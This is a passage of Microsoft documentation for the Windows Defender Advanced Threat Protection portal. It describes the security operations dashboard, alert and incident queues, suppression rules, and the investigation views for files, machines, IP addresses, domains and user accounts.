Take response actions Learn about the available response actions and apply them to
machines and files.
Windows Defender Security Center Security
operations dashboard
Applies to:
The Security operations dashboard is where the endpoint detection and response capabilities are surfaced. It
provides a high level overview of where detections were seen and highlights where response actions are needed.
The dashboard displays a snapshot of:
Active alerts
Machines at risk
Sensor health
Service health
Daily machines reporting
Active automated investigations
Automated investigations statistics
Users at risk
Suspicious activities
You can explore and investigate alerts and machines to quickly determine if, where, and when suspicious activities
occurred in your network to help you understand the context they appeared in.
From the Security operations dashboard you will see aggregated events to facilitate the identification of
significant events or behaviors on a machine. You can also drill down into granular events and low -level
indicators.
It also has clickable tiles that give visual cues on the overall health state of your organization. Each tile opens a
detailed view of the corresponding overview.
Active alerts
You can view the overall number of active alerts from the last 30 days in your network from the tile. Alerts are
grouped into New and In progress.
Each group is further sub-categorized into their corresponding alert severity levels. Click the number of alerts
inside each alert ring to see a sorted view of that category's queue (New or In progress).
For more information see, Alerts overview.
Each row includes an alert severity category and a short description of the alert. You can click an alert to see its
detailed view. For more information see, Investigate Windows Defender Advanced Threat Protection alerts and
Alerts overview.
Machines at risk
This tile shows you a list of machines with the highest number of active alerts. The total number of alerts for each
machine is shown in a circle next to the machine name, and then further categorized by severity levels at the far
end of the tile (hover over each severity bar to see its label).
Click the name of the machine to see details about that machine. For more information see, Investigate machines
in the Windows Defender Advanced Threat Protection Machines list.
You can also click Machines list at the top of the tile to go directly to the Machines list, sorted by the number of
active alerts. For more information see, Investigate machines in the Windows Defender Advanced Threat
Protection Machines list.
Sensor health
The Sensor health tile provides information on the individual machine’s ability to provide sensor data to the
Windows Defender ATP service. It reports how many machines require attention and helps you identify
problematic machines.
There are two status indicators that provide information on the number of machines that are not reporting
properly to the service:
Misconfigured – These machines might partially be reporting sensor data to the Windows Defender ATP
service and might have configuration errors that need to be corrected.
Inactive - Machines that have stopped reporting to the Windows Defender ATP service for more than seven
days in the past month.
When you click any of the groups, you’ll be directed to machines list, filtered according to your choice. For more
information, see Check sensor state and Investigate machines.
Service health
The Service health tile informs you if the service is active or if there are issues.
For more information on the service health, see Check the Windows Defender ATP service health.
Daily machines reporting

The Daily machines reporting tile shows a bar graph that represents the number of machines reporting daily in
the last 30 days. Hover over individual bars on the graph to see the exact number of machines reporting in each
day.
Active automated investigations
You can view the overall number of automated investigations from the last 30 days in your network from the
Active automated investigations tile. Investigations are grouped into Pending action, Waiting for machine,
and Running.
Automated investigations statistics

This tile shows statistics related to automated investigations in the last 30 days. It shows the number of
investigations completed, the number of successfully remediated investigations, the average pending time it takes
for an investigation to be initiated, the average time it takes to remediate an alert, the number of alerts
investigated, and the number of hours of automation saved from a typical manual investigation.
You can click on Automated investigations, Remidated investigations, and Alerts investigated to navigate
to the Investigations page, filtered by the appropriate category. This lets you see a detailed breakdown of
investigations in context.
Users at risk
The tile shows you a list of user accounts with the most active alerts and the number of alerts seen on high,
medium, or low alerts.
Click the user account to see details about the user account. For more information see Investigate a user account.
Suspicious activities
This tile shows audit events based on detections from various security components.
Related topics
Understand the Windows Defender Advanced Threat Protection portal
Portal overview
View the Secure Score dashboard and improve your secure score
View the Threat analytics dashboard and take recommended mitigation actions
Incidents in Windows Defender ATP
Applies to:
When a cybersecurity threat is emerging, or a potential attacker is deploying its tactics, techniques/tools, and
procedures (TTPs) on the network, Windows Defender ATP will quickly trigger alerts and launch matching
automatic investigations.
Windows Defender ATP applies correlation analytics and aggregates all related alerts and investigations into an
incident. Doing so helps narrate a broader story of an attack, thus providing you with the right visuals (upgraded
incident graph) and data representations to understand and deal with complex cross-entity threats to your
organization's network.
In this section
TOPIC DESCRIPTION
View and organize the Incidents queue See the list of incidents and learn how to apply filters to limit
the list and get a more focused view.
Manage incidents Learn how to manage incidents by assigning it, updating its
status, or setting its classification and other actions.
Investigate incidents See associated alerts, manage the incident, see alert
metadata, and visualizations to help you investigate an
incident.
View and organize the Windows Defender Advanced
Threat Protection Incidents queue
Applies to:
The Incidents queue shows a collection of incidents that were flagged from machines in your network. It helps
you sort through incidents to prioritize and create an informed cybersecurity response decision.
By default, the queue displays incidents seen in the last 30 days, with the most recent incident showing at the top
of the list, helping you see the most recent incidents first.
There are several options you can choose from to customize the Incidents queue view.
On the top navigation you can:
Customize columns to add or remove columns
Modify the number of items to view per page
Select the items to show per page
Batch-select the incidents to assign
Navigate between pages
Apply filters
Sort and filter the incidents queue

You can apply the following filters to limit the list of incidents and get a more focused view.
INCIDENT SEVERITY DESCRIPTION
High Threats often associated with advanced persistent threats

(Red) (APT). These incidents indicate a high risk due to the severity
of damage they can inflict on machines.
Medium Threats rarely observed in the organization, such as

(Orange) anomalous registry change, execution of suspicious files, and
observed behaviors typical of attack stages.
INCIDENT SEVERITY DESCRIPTION
Low Threats associated with prevalent malware and hack-tools

(Yellow) that do not necessarily indicate an advanced threat targeting
the organization.
Informational Informational incidents are those that might not be

(Grey) considered harmful to the network but might be good to
keep track of.
Category
Incidents are categorized based on the description of the stage by which the cybersecurity kill chain is in. This view
helps the threat analyst to determine priority, urgency, and corresponding response strategy to deploy based on
context.
Alerts
Indicates the number of alerts associated with or part of the incidents.
Machines
You can limit to show only the machines at risk which are associated with incidents.
Users
You can limit to show only the users of the machines at risk which are associated with incidents.
Assigned to
You can choose to show between unassigned incidents or those which are assigned to you.
Status
You can choose to limit the list of incidents shown based on their status to see which ones are active or resolved
Classification
Use this filter to choose between focusing on incidents flagged as true or false incidents.
Related topics
Incidents queue
Manage incidents
Manage Windows Defender ATP incidents
Applies to:
Managing incidents is an important part of every cybersecurity operation. You can manage incidents by selecting
an incident from the Incidents queue or the Incidents management pane. You can assign incidents to yourself,
change the status, classify, rename, or comment on them to keep track of their progress.
Selecting an incident from the Incidents queue brings up the Incident management pane where you can open
the incident page for details.
Assign incidents
If an incident has not been assigned yet, you can select Assign to me to assign the incident to yourself. Doing so
assumes ownership of not just the incident, but also all the alerts associated with it.
Change the incident status

You can categorize incidents (as Active, or Resolved) by changing their status as your investigation progresses.
This helps you organize and manage how your team can respond to incidents.
For example, your SoC analyst can review the urgent Active incidents for the day, and decide to assign them to
himself for investigation.
Alternatively, your SoC analyst might set the incident as Resolved if the incident has been remediated.
Classify the incident

You can choose not to set a classification, or decide to specify whether an incident is true or false. Doing so helps
the team see patterns and learn from them.
Rename incident
By default, incidents are assigned with numbers. You can rename the incident if your organization uses a naming
convention for easier cybersecurity threat identification.
Add comments and view the history of an incident

You can add comments and view historical events about an incident to see previous changes made to it.
Whenever a change or comment is made to an alert, it is recorded in the Comments and history section.
Added comments instantly appear on the pane.
Related topics
Incidents queue
Investigate incidents in Windows Defender ATP
Applies to:
Investigate incidents that affect your network, understand what they mean, and collate evidence to resolve them.
Analyze incident details

Click an incident to see the Incident pane. Select Open incident page to see the incident details and related
information (alerts, machines, investigations, evidence, graph).
Alerts
You can investigate the alerts and see how they were linked together in an incident. Alerts are grouped into
incidents based on the following reasons:
Automated investigation - The automated investigation triggered the linked alert while investigating the
original alert
File characteristics - The files associated with the alert have similar characteristics
Manual association - A user manually linked the alerts
Proximate time - The alerts were triggered on the same machine within a certain timeframe
Same file - The files associated with the alert are exactly the same
Same URL - The URL that triggered the alert is exactly the same
You can also manage an alert and see alert metadata along with other information. For more information, see
Investigate alerts.
Machines
You can also investigate the machines that are part of, or related to, a given incident. For more information, see
Investigate machines.
Investigations
Select Investigations to see all the automatic investigations launched by the system in response to the incident
alerts.
Going through the evidence

Windows Defender Advanced Threat Protection automatically investigates all the incidents' supported events and
suspicious entities in the alerts, providing you with auto-response and information about the important files,
processes, services, and more. This helps quickly detect and block potential threats in the incident. Each of the
analyzed entities will be marked as infected, remediated, or suspicious.
Visualizing associated cybersecurity threats

Windows Defender Advanced Threat Protection aggregates the threat information into an incident so you can see
the patterns and correlations coming in from various data points. You can view such correlation through the
incident graph.
Incident graph
The Graph tells the story of the cybersecurity attack. For example, it shows you what was the entry point, which
indicator of compromise or activity was observed on which machine. etc.
You can click the circles on the incident graph to view the details of the malicious files, associated file detections,
how many instances has there been worldwide, whether it’s been observed in your organization, if so, how many
instances.
Related topics
Incidents queue
Manage incidents
View and organize the Windows Defender
Advanced Threat Protection Alerts queue
Applies to:
The Alerts queue shows a list of alerts that were flagged from machines in your network. By default, the
queue displays alerts seen in the last 30 days in a grouped view, with the most recent alerts showing at the top
of the list, helping you see the most recent alerts first.
There are several options you can choose from to customize the alerts queue view.
Select grouped view or list view
Apply filters
Sort, filter, and group the alerts queue

You can apply the following filters to limit the list of alerts and get a more focused view the alerts.
Severity
ALERT SEVERITY DESCRIPTION
High Threats often associated with advanced persistent threats

(Red) (APT). These alerts indicate a high risk due to the severity of
damage they can inflict on machines.
Medium Threats rarely observed in the organization, such as

(Orange) anomalous registry change, execution of suspicious files,
and observed behaviors typical of attack stages.
ALERT SEVERITY DESCRIPTION
Low Threats associated with prevalent malware and hack-tools

(Yellow) that do not necessarily indicate an advanced threat
targeting the organization.
Informational Informational alerts are those that might not be considered

(Grey) harmful to the network but might be good to keep track of.
Understanding alert severity

It is important to understand that the Windows Defender Antivirus (Windows Defender AV ) and Windows
Defender ATP alert severities are different because they represent different scopes.
The Windows Defender AV threat severity represents the absolute severity of the detected threat (malware),
and is assigned based on the potential risk to the individual machine, if infected.
The Windows Defender ATP alert severity represents the severity of the detected behavior, the actual risk to
the machine but more importantly the potential risk to the organization.
So, for example:
The severity of a Windows Defender ATP alert about a Windows Defender AV detected threat that was
completely prevented and did not infect the machine is categorized as "Informational" because there was
no actual damage incurred.
An alert about a commercial malware was detected while executing, but blocked and remediated by
Windows Defender AV, is categorized as "Low" because it may have caused some damage to the individual
machine but poses no organizational threat.
An alert about malware detected while executing which can pose a threat not only to the individual
machine but to the organization, regardless if it was eventually blocked, may be ranked as "Medium" or
"High".
Suspicious behavioral alerts which were not blocked or remediated will be ranked "Low", "Medium" or
"High" following the same organizational threat considerations.
Status
You can choose to limit the list of alerts based on their status.
Investigation state
Corresponds to the automated investigation state.
Assigned to
You can choose between showing alerts that are assigned to you or automation.
Detection source
Select the source that triggered the alert detection. Microsoft Threat Experts preview participants can now
filter and see detections from the new threat experts managed hunting service.
NOTE
The Windows Defender Antivirus filter will only appear if machines are using Windows Defender Antivirus as the default
real-time protection antimalware product.
OS platform
Limit the alerts queue view by selecting the OS platform that you're interested in investigating.
Machine group
If you have specific machine groups that you're interested in checking the alerts on, you can select the groups
to limit the alerts queue view to display just those machine groups.
Associated threat
Use this filter to focus on alerts that are related to high profile threats. You can see the full list of high-profile
threats in Threat analytics.
Related topics
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate machines in the Windows Defender ATP Machines list
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Manage Windows Defender Advanced Threat
Protection alerts
Applies to:
Windows Defender ATP notifies you of possible malicious events, attributes, and contextual information through
alerts. A summary of new alerts is displayed in the Security operations dashboard, and you can access all
alerts in the Alerts queue.
You can manage alerts by selecting an alert in the Alerts queue or the Alerts related to this machine section
of the machine details view.
Selecting an alert in either of those places brings up the Alert management pane.
Link to another incident

You can create a new incident from the alert or link to an existing incident.
Assign alerts
If an alert is no yet assigned, you can select Assign to me to assign the alert to yourself.
Suppress alerts
There might be scenarios where you need to suppress alerts from appearing in Windows Defender Security
Center. Windows Defender ATP lets you create suppression rules for specific alerts that are known to be
innocuous such as known tools or processes in your organization.
Suppression rules can be created from an existing alert. They can be disabled and reenabled if needed.
When a suppression rule is created, it will take effect from the point when the rule is created. The rule will not
affect existing alerts already in the queue prior to the rule creation. The rule will only be applied on alerts that
satisfy the conditions set after the rule is created.
There are two contexts for a suppression rule that you can choose from:
Suppress alert on this machine
Suppress alert in my organization
The context of the rule lets you tailor what gets surfaced into the portal and ensure that only real security alerts
are surfaced into the portal.
You can use the examples in the following table to help you choose the context for a suppression rule:
CONTEX T DEFINITION EXAMPLE SCENARIOS
Suppress alert on this machine Alerts with the same alert title and on A security researcher is
that specific machine only will be investigating a malicious script
suppressed. that has been used to attack
other machines in your
All other alerts on that machine will organization.
not be suppressed. A developer regularly creates
PowerShell scripts for their
team.
Suppress alert in my organization Alerts with the same alert title on any A benign administrative tool is
machine will be suppressed. used by everyone in your
organization.
Suppress an alert and create a new suppression rule:

Create custom rules to control when alerts are suppressed, or resolved. You can control the context for when an
alert is suppressed by specifying the alert title, Indicator of compromise, and the conditions. After specifying the
context, you’ll be able to configure the action and scope on the alert.
1. Select the alert you'd like to suppress. This brings up the Alert management pane.
2. Select Create a suppression rule.
You can create a suppression rule based on the following attributes:
File hash
File name - wild card supported
File path - wild card supported
IP
URL - wild card supported
3. Select the Trigerring IOC.
4. Specify the action and scope on the alert.
You can automatically resolve an alert or hide it from the portal. Alerts that are automatically resolved will
appear in the resolved section of the alerts queue. Alerts that are marked as hidden will be suppressed
from the entire system, both on the machine's associated alerts and from the dashboard. You can also
specify to suppress the alert on a specific machine group.
5. Enter a rule name and a comment.
6. Click Save.
View the list of suppression rules
1. In the navigation pane, select Settings > Alert suppression.
2. The list of suppression rules shows all the rules that users in your organization have created.
For more information on managing suppression rules, see Manage suppression rules
Change the status of an alert

You can categorize alerts (as New, In Progress, or Resolved) by changing their status as your investigation
progresses. This helps you organize and manage how your team can respond to alerts.
For example, a team leader can review all New alerts, and decide to assign them to the In Progress queue for
further analysis.
Alternatively, the team leader might assign the alert to the Resolved queue if they know the alert is benign,
coming from a machine that is irrelevant (such as one belonging to a security administrator), or is being dealt
with through an earlier alert.
Alert classification
You can choose not to set a classification, or specify whether an alert is a true alert or a false alert. It's important
to provide the classification of true positive/false positive. This classification is used to monitor alert quality, and
make alerts more accurate. The "determination" field defines additional fidelity for a "true positive" classification.
Add comments and view the history of an alert

You can add comments and view historical events about an alert to see previous changes made to the alert.
Whenever a change or comment is made to an alert, it is recorded in the Comments and history section.
Added comments instantly appear on the pane.
Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Investigate Windows Defender Advanced Threat
Protection alerts
Applies to:
Investigate alerts that are affecting your network, understand what they mean, and how to resolve them.
Click an alert to see the alert details view and the various tiles that provide information about the alert.
You can also manage an alert and see alert metadata along with other information that can help you make
better decisions on how to approach them. You'll also see a status of the automated investigation on the upper
right corner. Clicking on the link will take you to the Automated investigations view. For more information, see
Automated investigations.
The alert context tile shows the where, who, and when context of the alert. As with other pages, you can click
on the icon beside the name or user account to bring up the machine or user details pane. The alert details
view also has a status tile that shows the status of the alert in the queue. You'll also see a description and a set
of recommended actions which you can expand.
For more information about managing alerts, see Manage alerts.
The alert details page also shows the alert process tree, an incident graph, and an artifact timeline.
You can click on the machine link from the alert view to navigate to the machine. The alert will be highlighted
automatically, and the timeline will display the appearance of the alert and its evidence in the Machine
timeline. If the alert appeared more than once on the machine, the latest occurrence will be displayed in the
Machine timeline.
Alerts attributed to an adversary or actor display a colored tile with the actor's name.
Click on the actor's name to see the threat intelligence profile of the actor, including a brief overview of the
actor, their interests or targets, their tools, tactics, and processes (TTPs) and areas where they've been observed
worldwide. You will also see a set of recommended actions to take.
Some actor profiles include a link to download a more comprehensive threat intelligence report.
The detailed alert profile helps you understand who the attackers are, who they target, what techniques, tools,
and procedures (TTPs) they use, which geolocations they are active in, and finally, what recommended actions
you may take. In many cases, you can download a more detailed Threat Intelligence report about this attacker
or campaign for offline reading.
Alert process tree

The Alert process tree takes alert triage and investigation to the next level, displaying the aggregated alert
and surrounding evidence that occurred within the same execution context and time period. This rich triage and
investigation context is available on the alert page.
The Alert process tree expands to display the execution path of the alert and related evidence that occurred
around the same period. Items marked with a thunderbolt icon should be given priority during investigation.
NOTE
The alert process tree might not be available in some alerts.
Clicking in the circle immediately to the left of the indicator displays its details.
The alert details pane helps you take a deeper look at the details about the alert. It displays rich information
about the execution details, file details, detections, observed worldwide, observed in organization, and other
details taken from the entity's page – while remaining on the alert page, so you never leave the current context
of your investigation.
Incident graph
The Incident Graph provides a visual representation of the organizational footprint of the alert and its
evidence: where the evidence that triggered the alert was observed on other machines. It provides a graphical
mapping from the original machine and evidence expanding to show other machines in the organization where
the triggering evidence was also observed.
The Incident Graph supports expansion by File, Process, command line, or Destination IP Address, as
appropriate.
The Incident Graph expansion by destination IP Address, shows the organizational footprint of
communications with this IP Address without having to change context by navigating to the IP Address page.
You can click the full circles on the incident graph to expand the nodes and view the expansion to other
machines where the matching criteria were observed.
Artifact timeline
The Artifact timeline feature provides an addition view of the evidence that triggered the alert on the
machine, and shows the date and time the evidence triggering the alert was observed, as well as the first time it
was observed on the machine. This can help in understanding if the evidence was first observed at the time of
the alert, or whether it was observed on the machine earlier - without triggering an alert.
Selecting an alert detail brings up the Details pane where you'll be able to see more information about the
alert such as file details, detections, instances of it observed worldwide, and in the organization.
Related topics
Investigate a file associated with a Windows
Defender ATP alert
Applies to:
Investigate the details of a file associated with a specific alert, behavior, or event to help determine if the file
exhibits malicious activities, identify the attack motivation, and understand the potential scope of the breach.
You can investigate files by using the search feature, clicking on a link from the Alert process tree, Incident
graph, Artifact timeline, or from an event listed in the Machine timeline.
You can get information from the following sections in the file view:
File details, Malware detection, Prevalence worldwide
Deep analysis
Alerts related to this file
File in organization
Most recent observed machines with file
File worldwide and Deep analysis

The file details, malware detection, and prevalence worldwide sections display various attributes about the file.
You’ll see actions you can take on the file. For more information on how to take action on a file, see Take
response action on a file.
You'll see details such as the file’s MD5, the VirusTotal detection ratio and Windows Defender AV detection if
available, and the file’s prevalence worldwide. You'll also be able to submit a file for deep analysis.
Alerts related to this file

The Alerts related to this file section provides a list of alerts that are associated with the file. This list is a
simplified version of the Alerts queue, and shows the date when the last activity was detected, a short description
of the alert, the user associated with the alert, the alert's severity, the alert's status in the queue, and who is
addressing the alert.
File in organization
The File in organization section provides details on the prevalence of the file, prevalence in email inboxes and
the name observed in the organization.
Most recent observed machines with the file

The Most recent observed machines with the file section allows you to specify a date range to see which
machines have been observed with the file.
This allows for greater accuracy in defining entities to display such as if and when an entity was observed in the
organization. For example, if you’re trying to identify the origin of a network communication to a certain IP
Address within a 10-minute period on a given date, you can specify that exact time interval, and see only files
that communicated with that IP Address at that time, drastically reducing unnecessary scrolling and searching.
Related topics
Investigate machines in the Windows Defender ATP
Machines list
Applies to:
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might be
related to the alert or the potential scope of breach.
You can click on affected machines whenever you see them in the portal to open a detailed report about that
machine. Affected machines are identified in the following areas:
The Machines list
The Alerts queue
The Security operations dashboard
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific machine, you'll see:
Machine details, Logged on users, Machine risk, and Machine Reporting
Machine timeline
The machine details, logged on users, machine risk, and machine reporting sections display various attributes
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an investigation
package available on the machine, you'll see a link that allows you to download the package.
For more information on how to take action on a machine, see Take response action on a machine.
Logged on users
Clicking on the logged on users in the Logged on users tile opens the Users Details pane that displays the following
information for logged on users in the past 30 days:
Interactive and remote interactive logins
Network, batch, and system logins
You'll also see details such as logon types for each user account, the user group, and when the account logon
occurred.
For more information, see Investigate user entities.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level can be determined
using the number of active alerts or by a combination of multiple risks that may increase the risk assessment and
their severity levels. You can influence a machine's risk level by resolving associated alerts manually or
automatically and also by suppressing an alert. It's also indicators of the active threats that machines could be
exposed to.
Azure Advanced Threat Protection
If you have enabled the Azure ATP feature and there are alerts related to the machine, you can click on the link that
will take you to the Azure ATP page where more information about the alerts are provided.
NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows Defender
ATP, you can enable this feature in advanced features. For more information on how to enable advanced features, see Turn on
advanced features.
Machine reporting
Provides the last internal IP and external IP of the machine. It also shows when the machine was first and last seen
reporting to the service.

The Alerts related to this machine section provides a list of alerts that are associated with the machine. You can
also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or Shift + click
to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected, a
short description of the alert, the user account associated with the alert, the alert's severity, the alert's status in the
queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine timeline
section to see the correlation between the alert and its related events on the machine by right-clicking on the alert
and selecting Select and mark events. This highlights the alert and its related events and helps distinguish them
from other alerts and events appearing in the timeline. Highlighted events are displayed in all information levels
whether you choose to view the timeline by Detections, Behaviors, or Verbose.
Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have been
observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period. You can
view the temporal sequence of events that occurred on a machine over a selected time period.
Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines and
displays the process tree flow in the Machine timeline. This gives you better context of the behavior which can
contribute to understanding the correlation between events, files, and IP addresses in relation to the machine.
Search for specific events
Use the search bar to look for specific timeline events. Harness the power of using the following defined search
queries based on type:value pairs and event filter types to sift through the search results:
Value - Type in any search keyword to filter the timeline with the attribute you’re searching for. This search
supports defined search queries based on type:value pairs.
You can use any of the following values:
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Informational level – Click the drop-down button to filter by the following levels:
Detections mode: displays Windows ATP Alerts and detections
Behaviors mode: displays "detections" and selected events of interest
Verbose mode: displays all raw events without aggregation or filtering
Event type - Click the drop-down button to filter by events such as Windows - Windows Defender ATP
alerts, Windows Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus. For
example, you can search for a file name, then filter the results to only see Process events matching the search
criteria or to only view file events, or even better: to view only network events over a period of time to make
sure no suspicious outbound communications go unnoticed.
NOTE
For firewall events to be displayed, you'll need to enable the audit policy, see Audit Filtering Platform connection. Firewall
covers the following events:
5025 - firewall service stopped
5031 - application blocked from accepting incoming connections on the network
5157 - blocked connection
User account – Click the drop-down button to filter the machine timeline by the following user associated
events:
Logon users
System
Network
Local service
The following example illustrates the use of type:value pair. The events were filtered by searching for the user
jonathan.wolcott and network events as the event type:
The results in the timeline only show network communication events run in the defined user context.
Filter events from a specific date
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display the
events of the current day.
Using the slider updates the listed alerts to the date that you select. Displayed events are filtered from that date and
older.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the Alerts
view and click on the machine associated with the alert to jump to the specific date when the alert was observed,
enabling you to investigate the events that took place around the alert.
Export machine timeline events
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose to
export the machine timeline for the current date or specify a date range. You can export up to seven days of data
and specify the specific time between the two dates.

Use the events per page drop-down to choose the number of alerts you’d like to see on the page. You can choose to
display 20, 50, or 100 events per page. You can also move between pages by clicking Older or Newer.
From the Machines list, you can also navigate to the file, IP, or URL view and the timeline associated with an alert
is retained, helping you view the investigation from different angles and retain the context of the event time line.
From the list of events that are displayed in the timeline, you can examine the behaviors or events in to help identify
indicators of interests such as files and IP addresses to help determine the scope of a breach. You can then use the
information to respond to events and keep your system secure.
You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific machine.
Expand an event to view associated processes related to the event. Click on the circle next to any process or IP
address in the process tree to investigate additional details of the identified processes. This action brings up the
Details pane which includes execution context of processes, network communications and a summary of meta
data on the file or IP address.
The details pane enriches the ‘in-context’ information across investigation and exploration activities, reducing the
need to switch between contexts. It lets you focus on the task of tracing associations between attributes without
leaving the current context.
Related topics
Investigate an IP address associated with a Windows
Defender ATP alert
Applies to:
Examine possible communication between your machines and external internet protocol (IP ) addresses.
Identifying all machines in the organization that communicated with a suspected or known malicious IP address,
such as Command and Control (C2) servers, helps determine the potential scope of breach, associated files, and
infected machines.
You can find information from the following sections in the IP address view:
IP worldwide, Reverse DNS names
Alerts related to this IP
IP in organization
Most recent observed machines with IP
IP Worldwide and Reverse DNS names

The IP address details section shows attributes of the IP address such as its ASN and its Reverse DNS names.
Alerts related to this IP

The Alerts related to this IP section provides a list of alerts that are associated with the IP.
IP in organization
The IP in organization section provides details on the prevalence of the IP address in the organization.
Most recent observed machines with IP

The Most recent observed machines with IP section provides a chronological view on the events and
associated alerts that were observed on the IP address.
Investigate an external IP:
1. Select IP from the Search bar drop-down menu.
2. Enter the IP address in the Search field.
3. Click the search icon or press Enter.
Details about the IP address are displayed, including: registration details (if available), reverse IPs (for example,
domains), prevalence of machines in the organization that communicated with this IP Address (during selectable
time period), and the machines in the organization that were observed communicating with this IP address.
NOTE
Search results will only be returned for IP addresses observed in communication with machines in the organization.
Use the search filters to define the search criteria. You can also use the timeline search box to filter the displayed
results of all machines in the organization observed communicating with the IP address, the file associated with
the communication and the last date observed.
Clicking any of the machine names will take you to that machine's view, where you can continue investigate
reported alerts, behaviors, and events.
Related topics
Investigate a domain associated with a Windows
Defender ATP alert
Applies to:
Investigate a domain to see if machines and servers in your enterprise network have been communicating with a
known malicious domain.
You can investigate a domain by using the search feature or by clicking on a domain link from the Machine
timeline.
You can see information from the following sections in the URL view:
URL details, Contacts, Nameservers
Alerts related to this URL
URL in organization
Most recent observed machines with URL
URL Worldwide
The URL details, contacts, and nameservers sections display various attributes about the URL.
Alerts related to this URL

The Alerts related to this URL section provides a list of alerts that are associated with the URL.
URL in organization
The URL in organization section provides details on the prevalence of the URL in the organization.
Most recent observed machinew with URL

The Most recent observed machinew with URL section provides a chronological view on the events and
associated alerts that were observed on the URL.
Investigate a domain:
1. Select URL from the Search bar drop-down menu.
2. Enter the URL in the Search field.
3. Click the search icon or press Enter. Details about the URL are displayed. Note: search results will only be
returned for URLs observed in communications from machines in the organization.
4. Use the search filters to define the search criteria. You can also use the timeline search box to filter the
displayed results of all machines in the organization observed communicating with the URL, the file
associated with the communication and the last date observed.
5. Clicking any of the machine names will take you to that machine's view, where you can continue investigate
reported alerts, behaviors, and events.
Related topics
Investigate a user account in Windows Defender
ATP
Applies to:
Investigate user account entities

Identify user accounts with the most active alerts (displayed on dashboard as "Users at risk") and investigate
cases of potential compromised credentials, or pivot on the associated user account when investigating an alert
or machine to identify possible lateral movement between machines with that user account.
You can find user account information in the following views:
Dashboard
Alert queue
Machine details page
A clickable user account link is available in these views, that will take you to the user account details page
where more details about the user account are shown.
When you investigate a user account entity, you'll see:
User account details, Azure Advanced Threat Protection (Azure ATP ) alerts, and Logged on machines
Alerts related to this user
Observed in organization (machines logged on to)
User details
The user account entity details, Azure ATP alerts, and logged on machines sections display various attributes
about the user account.
The user entity tile provides details about the user such as when the user was first and last seen. Depending on
the integration features you enable, you'll see other details. For example, if you enable the Skype for business
integration, you'll be able to contact the user from the portal.
If you have enabled the Azure ATP feature and there are alerts related to the user, you can click on the link that
will take you to the Azure ATP page where more information about the alerts are provided. The Azure ATP tile
also provides details such as the last AD site, total group memberships, and login failure associated with the
user.
NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows
Defender ATP, you can enable this feature in advanced features. For more information on how to enable advanced
features, see Turn on advanced features.
Logged on machines
You'll also see a list of the machines that the user logged on to, and can expand these to see details of the logon
events on each machine.
Alerts related to this user

This section provides a list of alerts that are associated with the user account. This list is a filtered view of the
Alert queue, and shows alerts where the user context is the selected user account, the date when the last
activity was detected, a short description of the alert, the machine associated with the alert, the alert's severity,
the alert's status in the queue, and who is assigned the alert.
Observed in organization
This section allows you to specify a date range to see a list of machines where this user was observed logged
on to, and the most frequent and least frequent logged on user account on each of these machines.
The machine health state is displayed in the machine icon and color as well as in a description text. Clicking on
the icon displays additional details regarding machine health.
Search for specific user accounts

1. Select User from the Search bar drop-down menu.
2. Enter the user account in the Search field.
3. Click the search icon or press Enter.
A list of users matching the query text is displayed. You'll see the user account's domain and name, when the
user account was last seen, and the total number of machines it was observed logged on to in the last 30 days.
You can filter the results by the following time periods:
1 day
3 days
7 days
30 days
6 months
Related topics
View and organize the Windows Defender ATP
Machines list
Applies to:
The Machines list shows a list of the machines in your network where alerts were generated. By default, the
queue displays machines with alerts seen in the last 30 days.
At a glance you'll see information such as domain, risk level, OS platform, and other details.
There are several options you can choose from to customize the machines list view. On the top navigation you can:
Export the entire list in CSV format
Apply filters
Use the machine list in these main scenarios:
During onboarding
During the onboarding process, the Machines list is gradually populated with machines as they begin to
report sensor data. Use this view to track your onboarded endpoints as they come online. Sort and filter by
time of last report, Active malware category, or Sensor health state, or download the complete
endpoint list as a CSV file for offline analysis.
[NOTE ] Exporting the list depends on the number of machines in your organization. It might take a
significant amount of time to download, depending on how large your organization is. Exporting the list
in CSV format displays the data in an unfiltered manner. The CSV file will include all machines in the
organization, regardless of any filtering applied in the view itself.
Day-to-day work
The list enables easy identification of machines most at risk in a glance. High-risk machines have the
greatest number and highest-severity alerts. Sorting machines by Active alerts, helps identify the most
vulnerable machines and take action on them.
Sort and filter the machine list
You can apply the following filters to limit the list of alerts and get a more focused view.
Risk level
Machine risk levels are indicators of the active threats that machines could be exposed to. A machine's risk level is
determined using the number of active alerts and their severity levels. You can influence a machine's risk level by
resolving associated alerts manually or automatically and also by suppressing an alert.
OS Platform
Limit the alerts queue view by selecting the OS platform that you're interested in investigating.
Health state
Filter the list to view specific machines grouped together by the following machine health states:
Active – Machines that are actively reporting sensor data to the service.
Misconfigured – Machines that have impaired communications with service or are unable to send sensor
data. Misconfigured machines can further be classified to:
No sensor data
Impaired communications
For more information on how to address issues on misconfigured machines see, Fix unhealthy sensors.
Inactive – Machines that have completely stopped sending signals for more than 7 days.
Security state
Filter the list to view specific machines that are well configured or require attention based on the Windows
Defender security controls that are enabled in your organization.
Well configured - Machines have the Windows Defender security controls well configured.
Requires attention - Machines where improvements can be made to increase the overall security posture of
your organization.
For more information, see View the Secure Score dashboard.
Tags
